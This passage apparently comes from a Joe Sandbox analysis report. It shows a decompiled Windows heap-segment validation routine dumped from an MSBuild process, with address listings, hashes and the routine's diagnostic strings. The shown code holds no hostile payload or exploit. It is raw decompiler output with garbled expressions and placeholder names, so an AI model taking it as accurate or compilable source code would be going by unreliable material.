                                            • Opcode Fuzzy Hash: 088abc9fa28128cee729212e91c023ebc8c54220c054a2c02c8b60fc02508183
                                            • Instruction Fuzzy Hash: 2A61C63A51154DDFD322AB48D885D7C73E4EB18F20F49807EF589AB7A3C63898419F0A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E010C4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                            				signed int _v6;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed int _t189;
                                            				intOrPtr _t191;
                                            				intOrPtr _t210;
                                            				signed int _t225;
                                            				signed char _t231;
                                            				intOrPtr _t232;
                                            				unsigned int _t245;
                                            				intOrPtr _t249;
                                            				intOrPtr _t259;
                                            				signed int _t281;
                                            				signed int _t283;
                                            				intOrPtr _t284;
                                            				signed int _t288;
                                            				signed int* _t294;
                                            				signed int* _t298;
                                            				intOrPtr* _t299;
                                            				intOrPtr* _t300;
                                            				signed int _t307;
                                            				signed int _t309;
                                            				signed short _t312;
                                            				signed short _t315;
                                            				signed int _t317;
                                            				signed int _t320;
                                            				signed int _t322;
                                            				signed int _t326;
                                            				signed int _t327;
                                            				void* _t328;
                                            				signed int _t332;
                                            				signed int _t340;
                                            				signed int _t342;
                                            				signed char _t344;
                                            				signed int* _t345;
                                            				void* _t346;
                                            				signed char _t352;
                                            				signed char _t367;
                                            				signed int _t374;
                                            				intOrPtr* _t378;
                                            				signed int _t380;
                                            				signed int _t385;
                                            				signed char _t390;
                                            				unsigned int _t392;
                                            				signed char _t395;
                                            				unsigned int _t397;
                                            				intOrPtr* _t400;
                                            				signed int _t402;
                                            				signed int _t405;
                                            				intOrPtr* _t406;
                                            				signed int _t407;
                                            				intOrPtr _t412;
                                            				void* _t414;
                                            				signed int _t415;
                                            				signed int _t416;
                                            				signed int _t429;
                                            
                                            				_v16 = _v16 & 0x00000000;
                                            				_t189 = 0;
                                            				_v8 = _v8 & 0;
                                            				_t332 = __edx;
                                            				_v12 = 0;
                                            				_t414 = __ecx;
                                            				_t415 = __edx;
                                            				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                            					L88:
                                            					_t416 = _v16;
                                            					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                            						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                            						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                            							L107:
                                            							return 1;
                                            						}
                                            						_t191 =  *[fs:0x30];
                                            						__eflags =  *(_t191 + 0xc);
                                            						if( *(_t191 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push(_v12);
                                            						_push( *((intOrPtr*)(_t332 + 0x30)));
                                            						_push(_t332);
                                            						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                            						L122:
                                            						E0100B150();
                                            						L119:
                                            						return 0;
                                            					}
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push(_t416);
                                            					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                            					_push(_t332);
                                            					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                            					goto L122;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				do {
                                            					L1:
                                            					 *_a16 = _t415;
                                            					if( *(_t414 + 0x4c) != 0) {
                                            						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                            						 *_t415 = _t392;
                                            						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                            						_t424 = _t392 >> 0x18 - _t352;
                                            						if(_t392 >> 0x18 != _t352) {
                                            							_push(_t352);
                                            							E010BFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                            						}
                                            					}
                                            					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                            						_t210 =  *[fs:0x30];
                                            						__eflags =  *(_t210 + 0xc);
                                            						if( *(_t210 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push(_v8 & 0x0000ffff);
                                            						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                            						__eflags = _t340;
                                            						_push(_t340);
                                            						E0100B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                            						L117:
                                            						__eflags =  *(_t414 + 0x4c);
                                            						if( *(_t414 + 0x4c) != 0) {
                                            							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                            							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            							__eflags =  *_t415;
                                            						}
                                            						goto L119;
                                            					}
                                            					_t225 =  *_t415 & 0x0000ffff;
                                            					_t390 =  *(_t415 + 2);
                                            					_t342 = _t225;
                                            					_v8 = _t342;
                                            					_v20 = _t342;
                                            					_v28 = _t225 << 3;
                                            					if((_t390 & 0x00000001) == 0) {
                                            						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                            						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                            						__eflags = _t344 & 0x00000001;
                                            						if((_t344 & 0x00000001) == 0) {
                                            							L66:
                                            							_t345 = _a12;
                                            							 *_a8 =  *_a8 + 1;
                                            							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                            							__eflags =  *_t345;
                                            							L67:
                                            							_t231 =  *(_t415 + 6);
                                            							if(_t231 == 0) {
                                            								_t346 = _t414;
                                            							} else {
                                            								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                            							}
                                            							if(_t346 != _t332) {
                                            								_t232 =  *[fs:0x30];
                                            								__eflags =  *(_t232 + 0xc);
                                            								if( *(_t232 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push( *(_t415 + 6) & 0x000000ff);
                                            								_push(_t415);
                                            								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                            								goto L95;
                                            							} else {
                                            								if( *((char*)(_t415 + 7)) != 3) {
                                            									__eflags =  *(_t414 + 0x4c);
                                            									if( *(_t414 + 0x4c) != 0) {
                                            										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            										__eflags =  *_t415;
                                            									}
                                            									_t415 = _t415 + _v28;
                                            									__eflags = _t415;
                                            									goto L86;
                                            								}
                                            								_t245 =  *(_t415 + 0x1c);
                                            								if(_t245 == 0) {
                                            									_t395 =  *_t415 & 0x0000ffff;
                                            									_v6 = _t395 >> 8;
                                            									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                            									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                            										__eflags =  *(_t414 + 0x4c);
                                            										if( *(_t414 + 0x4c) != 0) {
                                            											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            											__eflags =  *_t415;
                                            										}
                                            										goto L107;
                                            									}
                                            									_t249 =  *[fs:0x30];
                                            									__eflags =  *(_t249 + 0xc);
                                            									if( *(_t249 + 0xc) == 0) {
                                            										_push("HEAP: ");
                                            										E0100B150();
                                            									} else {
                                            										E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									}
                                            									_push( *((intOrPtr*)(_t332 + 0x28)));
                                            									_push(_t415);
                                            									_push("Heap block at %p is not last block in segment (%p)\n");
                                            									L95:
                                            									E0100B150();
                                            									goto L117;
                                            								}
                                            								_v12 = _v12 + 1;
                                            								_v16 = _v16 + (_t245 >> 0xc);
                                            								if( *(_t414 + 0x4c) != 0) {
                                            									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            								}
                                            								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                            								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                            									L82:
                                            									_v8 = _v8 & 0x00000000;
                                            									goto L86;
                                            								} else {
                                            									if( *(_t414 + 0x4c) != 0) {
                                            										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                            										 *_t415 = _t397;
                                            										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                            										_t442 = _t397 >> 0x18 - _t367;
                                            										if(_t397 >> 0x18 != _t367) {
                                            											_push(_t367);
                                            											E010BFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                            										}
                                            									}
                                            									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                            										_t259 =  *[fs:0x30];
                                            										__eflags =  *(_t259 + 0xc);
                                            										if( *(_t259 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E0100B150();
                                            										} else {
                                            											E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                            										_push(_t415);
                                            										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                            										goto L95;
                                            									} else {
                                            										if( *(_t414 + 0x4c) != 0) {
                                            											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            										}
                                            										goto L82;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						_t281 = _v28 + 0xfffffff0;
                                            						_v24 = _t281;
                                            						__eflags = _t390 & 0x00000002;
                                            						if((_t390 & 0x00000002) != 0) {
                                            							__eflags = _t281 - 4;
                                            							if(_t281 > 4) {
                                            								_t281 = _t281 - 4;
                                            								__eflags = _t281;
                                            								_v24 = _t281;
                                            							}
                                            						}
                                            						__eflags = _t390 & 0x00000008;
                                            						if((_t390 & 0x00000008) == 0) {
                                            							_t102 = _t415 + 0x10; // -8
                                            							_t283 = E0105D540(_t102, _t281, 0xfeeefeee);
                                            							_v20 = _t283;
                                            							__eflags = _t283 - _v24;
                                            							if(_t283 != _v24) {
                                            								_t284 =  *[fs:0x30];
                                            								__eflags =  *(_t284 + 0xc);
                                            								if( *(_t284 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_t288 = _v20 + 8 + _t415;
                                            								__eflags = _t288;
                                            								_push(_t288);
                                            								_push(_t415);
                                            								_push("Free Heap block %p modified at %p after it was freed\n");
                                            								goto L95;
                                            							}
                                            							goto L66;
                                            						} else {
                                            							_t374 =  *(_t415 + 8);
                                            							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                            							_v24 = _t374;
                                            							_v28 = _t400;
                                            							_t294 =  *(_t374 + 4);
                                            							__eflags =  *_t400 - _t294;
                                            							if( *_t400 != _t294) {
                                            								L64:
                                            								_push(_t374);
                                            								_push( *_t400);
                                            								_t101 = _t415 + 8; // -16
                                            								E010CA80D(_t414, 0xd, _t101, _t294);
                                            								goto L86;
                                            							}
                                            							_t56 = _t415 + 8; // -16
                                            							__eflags =  *_t400 - _t56;
                                            							_t374 = _v24;
                                            							if( *_t400 != _t56) {
                                            								goto L64;
                                            							}
                                            							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                            							_t402 =  *(_t414 + 0xb4);
                                            							__eflags = _t402;
                                            							if(_t402 == 0) {
                                            								L35:
                                            								_t298 = _v28;
                                            								 *_t298 = _t374;
                                            								 *(_t374 + 4) = _t298;
                                            								__eflags =  *(_t415 + 2) & 0x00000008;
                                            								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                            									L39:
                                            									_t377 =  *_t415 & 0x0000ffff;
                                            									_t299 = _t414 + 0xc0;
                                            									_v28 =  *_t415 & 0x0000ffff;
                                            									 *(_t415 + 2) = 0;
                                            									 *((char*)(_t415 + 7)) = 0;
                                            									__eflags =  *(_t414 + 0xb4);
                                            									if( *(_t414 + 0xb4) == 0) {
                                            										_t378 =  *_t299;
                                            									} else {
                                            										_t378 = E0102E12C(_t414, _t377);
                                            										_t299 = _t414 + 0xc0;
                                            									}
                                            									__eflags = _t299 - _t378;
                                            									if(_t299 == _t378) {
                                            										L51:
                                            										_t300 =  *((intOrPtr*)(_t378 + 4));
                                            										__eflags =  *_t300 - _t378;
                                            										if( *_t300 != _t378) {
                                            											_push(_t378);
                                            											_push( *_t300);
                                            											__eflags = 0;
                                            											E010CA80D(0, 0xd, _t378, 0);
                                            										} else {
                                            											_t87 = _t415 + 8; // -16
                                            											_t406 = _t87;
                                            											 *_t406 = _t378;
                                            											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                            											 *_t300 = _t406;
                                            											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                            										}
                                            										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                            										_t405 =  *(_t414 + 0xb4);
                                            										__eflags = _t405;
                                            										if(_t405 == 0) {
                                            											L61:
                                            											__eflags =  *(_t414 + 0x4c);
                                            											if(__eflags != 0) {
                                            												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            											}
                                            											goto L86;
                                            										} else {
                                            											_t380 =  *_t415 & 0x0000ffff;
                                            											while(1) {
                                            												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                            												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                            													break;
                                            												}
                                            												_t307 =  *_t405;
                                            												__eflags = _t307;
                                            												if(_t307 == 0) {
                                            													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                            													L60:
                                            													_t94 = _t415 + 8; // -16
                                            													E0102E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                            													goto L61;
                                            												}
                                            												_t405 = _t307;
                                            											}
                                            											_t309 = _t380;
                                            											goto L60;
                                            										}
                                            									} else {
                                            										_t407 =  *(_t414 + 0x4c);
                                            										while(1) {
                                            											__eflags = _t407;
                                            											if(_t407 == 0) {
                                            												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                            											} else {
                                            												_t315 =  *(_t378 - 8);
                                            												_t407 =  *(_t414 + 0x4c);
                                            												__eflags = _t315 & _t407;
                                            												if((_t315 & _t407) != 0) {
                                            													_t315 = _t315 ^  *(_t414 + 0x50);
                                            													__eflags = _t315;
                                            												}
                                            												_t312 = _t315 & 0x0000ffff;
                                            											}
                                            											__eflags = _v28 - (_t312 & 0x0000ffff);
                                            											if(_v28 <= (_t312 & 0x0000ffff)) {
                                            												goto L51;
                                            											}
                                            											_t378 =  *_t378;
                                            											__eflags = _t414 + 0xc0 - _t378;
                                            											if(_t414 + 0xc0 != _t378) {
                                            												continue;
                                            											}
                                            											goto L51;
                                            										}
                                            										goto L51;
                                            									}
                                            								}
                                            								_t317 = E0102A229(_t414, _t415);
                                            								__eflags = _t317;
                                            								if(_t317 != 0) {
                                            									goto L39;
                                            								}
                                            								E0102A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                            								goto L86;
                                            							}
                                            							_t385 =  *_t415 & 0x0000ffff;
                                            							while(1) {
                                            								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                            								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                            									break;
                                            								}
                                            								_t320 =  *_t402;
                                            								__eflags = _t320;
                                            								if(_t320 == 0) {
                                            									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                            									L34:
                                            									_t63 = _t415 + 8; // -16
                                            									E0102BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                            									_t374 = _v24;
                                            									goto L35;
                                            								}
                                            								_t402 = _t320;
                                            							}
                                            							_t322 = _t385;
                                            							goto L34;
                                            						}
                                            					}
                                            					if(_a20 == 0) {
                                            						L18:
                                            						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                            							goto L67;
                                            						}
                                            						if(E010B23E3(_t414, _t415) == 0) {
                                            							goto L117;
                                            						}
                                            						goto L67;
                                            					} else {
                                            						if((_t390 & 0x00000002) == 0) {
                                            							_t326 =  *(_t415 + 3) & 0x000000ff;
                                            						} else {
                                            							_t328 = E01001F5B(_t415);
                                            							_t342 = _v20;
                                            							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                            						}
                                            						_t429 = _t326;
                                            						if(_t429 == 0) {
                                            							goto L18;
                                            						}
                                            						if(_t429 >= 0) {
                                            							__eflags = _t326 & 0x00000800;
                                            							if(__eflags != 0) {
                                            								goto L18;
                                            							}
                                            							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                            							if(__eflags >= 0) {
                                            								goto L18;
                                            							}
                                            							_t412 = _a20;
                                            							_t327 = _t326 & 0x0000ffff;
                                            							L17:
                                            							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                            							goto L18;
                                            						}
                                            						_t327 = _t326 & 0x00007fff;
                                            						if(_t327 >= 0x81) {
                                            							goto L18;
                                            						}
                                            						_t412 = _a24;
                                            						goto L17;
                                            					}
                                            					L86:
                                            				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                            				_t189 = _v12;
                                            				goto L88;
                                            			}



































































                                            0x010c4af7
                                            0x010c4afb
                                            0x010c4afd
                                            0x010c4b01
                                            0x010c4b03
                                            0x010c4b08
                                            0x010c4b0a
                                            0x010c4b0f
                                            0x010c4eb5
                                            0x010c4eb5
                                            0x010c4ebb
                                            0x010c50d5
                                            0x010c50d8
                                            0x010c4ff6
                                            0x00000000
                                            0x010c4ff6
                                            0x010c50de
                                            0x010c50e4
                                            0x010c50e8
                                            0x010c5107
                                            0x010c510c
                                            0x010c50ea
                                            0x010c50ff
                                            0x010c5104
                                            0x010c5112
                                            0x010c5115
                                            0x010c5118
                                            0x010c5119
                                            0x010c50cb
                                            0x010c50cb
                                            0x010c50af
                                            0x00000000
                                            0x010c50af
                                            0x010c4ecb
                                            0x010c50b6
                                            0x010c50bb
                                            0x010c4ed1
                                            0x010c4ee6
                                            0x010c4eeb
                                            0x010c50c1
                                            0x010c50c2
                                            0x010c50c5
                                            0x010c50c6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c4b15
                                            0x010c4b15
                                            0x010c4b1c
                                            0x010c4b1e
                                            0x010c4b23
                                            0x010c4b27
                                            0x010c4b33
                                            0x010c4b38
                                            0x010c4b3a
                                            0x010c4b3c
                                            0x010c4b41
                                            0x010c4b41
                                            0x010c4b3a
                                            0x010c4b52
                                            0x010c5045
                                            0x010c504b
                                            0x010c504f
                                            0x010c506e
                                            0x010c5073
                                            0x010c5051
                                            0x010c5066
                                            0x010c506b
                                            0x010c5083
                                            0x010c5088
                                            0x010c5088
                                            0x010c508a
                                            0x010c5091
                                            0x010c5099
                                            0x010c5099
                                            0x010c509d
                                            0x010c50a7
                                            0x010c50ad
                                            0x010c50ad
                                            0x010c50ad
                                            0x00000000
                                            0x010c509d
                                            0x010c4b58
                                            0x010c4b5b
                                            0x010c4b5e
                                            0x010c4b63
                                            0x010c4b66
                                            0x010c4b69
                                            0x010c4b6f
                                            0x010c4be4
                                            0x010c4bf0
                                            0x010c4bf2
                                            0x010c4bf5
                                            0x010c4dc3
                                            0x010c4dc6
                                            0x010c4dc9
                                            0x010c4dce
                                            0x010c4dce
                                            0x010c4dd0
                                            0x010c4dd0
                                            0x010c4dd5
                                            0x010c4def
                                            0x010c4dd7
                                            0x010c4de7
                                            0x010c4de7
                                            0x010c4df3
                                            0x010c5001
                                            0x010c5007
                                            0x010c500b
                                            0x010c502a
                                            0x010c502f
                                            0x010c500d
                                            0x010c5022
                                            0x010c5027
                                            0x010c5039
                                            0x010c503a
                                            0x010c503b
                                            0x00000000
                                            0x010c4df9
                                            0x010c4dfd
                                            0x010c4e90
                                            0x010c4e94
                                            0x010c4e9e
                                            0x010c4ea4
                                            0x010c4ea4
                                            0x010c4ea4
                                            0x010c4ea6
                                            0x010c4ea6
                                            0x00000000
                                            0x010c4ea6
                                            0x010c4e03
                                            0x010c4e08
                                            0x010c4f88
                                            0x010c4f92
                                            0x010c4f99
                                            0x010c4f9c
                                            0x010c4fe0
                                            0x010c4fe4
                                            0x010c4fee
                                            0x010c4ff4
                                            0x010c4ff4
                                            0x010c4ff4
                                            0x00000000
                                            0x010c4fe4
                                            0x010c4f9e
                                            0x010c4fa4
                                            0x010c4fa8
                                            0x010c4fc7
                                            0x010c4fcc
                                            0x010c4faa
                                            0x010c4fbf
                                            0x010c4fc4
                                            0x010c4fd2
                                            0x010c4fd5
                                            0x010c4fd6
                                            0x010c4f34
                                            0x010c4f34
                                            0x00000000
                                            0x010c4f39
                                            0x010c4e0e
                                            0x010c4e14
                                            0x010c4e1b
                                            0x010c4e25
                                            0x010c4e2b
                                            0x010c4e2b
                                            0x010c4e33
                                            0x010c4e38
                                            0x010c4e8a
                                            0x010c4e8a
                                            0x00000000
                                            0x010c4e3a
                                            0x010c4e3e
                                            0x010c4e43
                                            0x010c4e47
                                            0x010c4e53
                                            0x010c4e58
                                            0x010c4e5a
                                            0x010c4e5c
                                            0x010c4e61
                                            0x010c4e61
                                            0x010c4e5a
                                            0x010c4e6e
                                            0x010c4f41
                                            0x010c4f47
                                            0x010c4f4b
                                            0x010c4f6a
                                            0x010c4f6f
                                            0x010c4f4d
                                            0x010c4f62
                                            0x010c4f67
                                            0x010c4f7f
                                            0x010c4f80
                                            0x010c4f81
                                            0x00000000
                                            0x010c4e74
                                            0x010c4e78
                                            0x010c4e82
                                            0x010c4e88
                                            0x010c4e88
                                            0x00000000
                                            0x010c4e78
                                            0x010c4e6e
                                            0x010c4e38
                                            0x010c4df3
                                            0x010c4bfe
                                            0x010c4c01
                                            0x010c4c04
                                            0x010c4c07
                                            0x010c4c09
                                            0x010c4c0c
                                            0x010c4c0e
                                            0x010c4c0e
                                            0x010c4c11
                                            0x010c4c11
                                            0x010c4c0c
                                            0x010c4c14
                                            0x010c4c17
                                            0x010c4dae
                                            0x010c4db2
                                            0x010c4db7
                                            0x010c4dba
                                            0x010c4dbd
                                            0x010c4ef1
                                            0x010c4ef7
                                            0x010c4efb
                                            0x010c4f1a
                                            0x010c4f1f
                                            0x010c4efd
                                            0x010c4f12
                                            0x010c4f17
                                            0x010c4f2b
                                            0x010c4f2b
                                            0x010c4f2d
                                            0x010c4f2e
                                            0x010c4f2f
                                            0x00000000
                                            0x010c4f2f
                                            0x00000000
                                            0x010c4c1d
                                            0x010c4c1d
                                            0x010c4c20
                                            0x010c4c23
                                            0x010c4c26
                                            0x010c4c29
                                            0x010c4c2c
                                            0x010c4c2e
                                            0x010c4d91
                                            0x010c4d91
                                            0x010c4d92
                                            0x010c4d97
                                            0x010c4d9e
                                            0x00000000
                                            0x010c4d9e
                                            0x010c4c34
                                            0x010c4c37
                                            0x010c4c39
                                            0x010c4c3c
                                            0x00000000
                                            0x00000000
                                            0x010c4c45
                                            0x010c4c48
                                            0x010c4c4e
                                            0x010c4c50
                                            0x010c4c78
                                            0x010c4c78
                                            0x010c4c7b
                                            0x010c4c7d
                                            0x010c4c80
                                            0x010c4c84
                                            0x010c4cad
                                            0x010c4cad
                                            0x010c4cb0
                                            0x010c4cb8
                                            0x010c4cbb
                                            0x010c4cbe
                                            0x010c4cc1
                                            0x010c4cc7
                                            0x010c4cdc
                                            0x010c4cc9
                                            0x010c4cd2
                                            0x010c4cd4
                                            0x010c4cd4
                                            0x010c4cde
                                            0x010c4ce0
                                            0x010c4d13
                                            0x010c4d13
                                            0x010c4d16
                                            0x010c4d18
                                            0x010c4d29
                                            0x010c4d2a
                                            0x010c4d2c
                                            0x010c4d34
                                            0x010c4d1a
                                            0x010c4d1a
                                            0x010c4d1a
                                            0x010c4d1d
                                            0x010c4d1f
                                            0x010c4d22
                                            0x010c4d24
                                            0x010c4d24
                                            0x010c4d3c
                                            0x010c4d3f
                                            0x010c4d45
                                            0x010c4d47
                                            0x010c4d6c
                                            0x010c4d6c
                                            0x010c4d70
                                            0x010c4d7e
                                            0x010c4d84
                                            0x010c4d84
                                            0x00000000
                                            0x010c4d49
                                            0x010c4d49
                                            0x010c4d56
                                            0x010c4d56
                                            0x010c4d59
                                            0x00000000
                                            0x00000000
                                            0x010c4d4e
                                            0x010c4d50
                                            0x010c4d52
                                            0x010c4d8e
                                            0x010c4d5d
                                            0x010c4d5f
                                            0x010c4d67
                                            0x00000000
                                            0x010c4d67
                                            0x010c4d54
                                            0x010c4d54
                                            0x010c4d5b
                                            0x00000000
                                            0x010c4d5b
                                            0x010c4ce2
                                            0x010c4ce2
                                            0x010c4ce5
                                            0x010c4ce5
                                            0x010c4ce7
                                            0x010c4cfb
                                            0x010c4ce9
                                            0x010c4ce9
                                            0x010c4cec
                                            0x010c4cef
                                            0x010c4cf1
                                            0x010c4cf3
                                            0x010c4cf3
                                            0x010c4cf3
                                            0x010c4cf6
                                            0x010c4cf6
                                            0x010c4d02
                                            0x010c4d05
                                            0x00000000
                                            0x00000000
                                            0x010c4d07
                                            0x010c4d0f
                                            0x010c4d11
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c4d11
                                            0x00000000
                                            0x010c4ce5
                                            0x010c4ce0
                                            0x010c4c8a
                                            0x010c4c8f
                                            0x010c4c91
                                            0x00000000
                                            0x00000000
                                            0x010c4c9d
                                            0x00000000
                                            0x010c4c9d
                                            0x010c4c52
                                            0x010c4c5f
                                            0x010c4c5f
                                            0x010c4c62
                                            0x00000000
                                            0x00000000
                                            0x010c4c57
                                            0x010c4c59
                                            0x010c4c5b
                                            0x010c4caa
                                            0x010c4c66
                                            0x010c4c68
                                            0x010c4c70
                                            0x010c4c75
                                            0x00000000
                                            0x010c4c75
                                            0x010c4c5d
                                            0x010c4c5d
                                            0x010c4c64
                                            0x00000000
                                            0x010c4c64
                                            0x010c4c17
                                            0x010c4b75
                                            0x010c4bc4
                                            0x010c4bc8
                                            0x00000000
                                            0x00000000
                                            0x010c4bd9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010c4b77
                                            0x010c4b7a
                                            0x010c4b8c
                                            0x010c4b7c
                                            0x010c4b7e
                                            0x010c4b83
                                            0x010c4b86
                                            0x010c4b86
                                            0x010c4b90
                                            0x010c4b93
                                            0x00000000
                                            0x00000000
                                            0x010c4b95
                                            0x010c4bab
                                            0x010c4bb0
                                            0x00000000
                                            0x00000000
                                            0x010c4bb2
                                            0x010c4bb9
                                            0x00000000
                                            0x00000000
                                            0x010c4bbb
                                            0x010c4bbe
                                            0x010c4bc1
                                            0x010c4bc1
                                            0x00000000
                                            0x010c4bc1
                                            0x010c4b97
                                            0x010c4ba4
                                            0x00000000
                                            0x00000000
                                            0x010c4ba6
                                            0x00000000
                                            0x010c4ba6
                                            0x010c4ea9
                                            0x010c4ea9
                                            0x010c4eb2
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: c94b604275cc2d1b9954be791d2511d047621a784526488af777fff2faa363df
                                            • Instruction ID: ba88b4844498ed116897acdecac0d298285e0bf34b171ded7da1e0f13967c33a
                                            • Opcode Fuzzy Hash: c94b604275cc2d1b9954be791d2511d047621a784526488af777fff2faa363df
                                            • Instruction Fuzzy Hash: 8B12AA346006469BE725DF69C4A4ABEBBE1FF48B10F1484ADE5C6CB681D734E881CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

